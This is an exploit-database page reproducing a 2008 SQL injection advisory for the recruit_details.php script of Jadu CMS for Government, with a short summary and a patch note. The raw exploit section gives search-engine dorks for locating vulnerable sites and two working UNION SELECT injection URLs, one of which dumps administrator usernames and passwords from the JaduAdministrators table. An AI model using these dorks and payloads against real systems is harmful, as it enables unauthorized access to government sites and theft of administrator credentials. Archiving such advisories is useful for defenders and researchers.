header-logo
Suggest Exploit
vendor:
Jadu CMS for Government
by:
r45c4l
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jadu CMS for Government
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

Jadu CMS for Government (recruit_details.php) Remote SQL Inj

A remote SQL injection vulnerability exists in Jadu CMS for Government. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'recruit_details.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of Jadu CMS for Government.
Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z -beenu- DON # 
#-OutLawz- P47tr1ck- FeDeReR- MAGE- JeTFyrE-FunctionSys-jappan #              
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l (Special thanks to congrallion)
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: Jadu CMS for Government (recruit_details.php) Remote SQL Inj
#
#
# Vendor: http://www.jadu.co.uk/site/index.php
#
# 
#
###########################################################
#
# d0rk:inurl:site/scripts/recruit_details.php?id
# d0rk:inurl:"recruit_details.php?id=" 
#
###########################################################
 
  POC 1: 

	http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12--

  POC 2:

	http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+JaduAdministrators--


###########################################################
#
#  Bug discovered : 24 Sep.2008
###########################################################

# milw0rm.com [2008-09-24]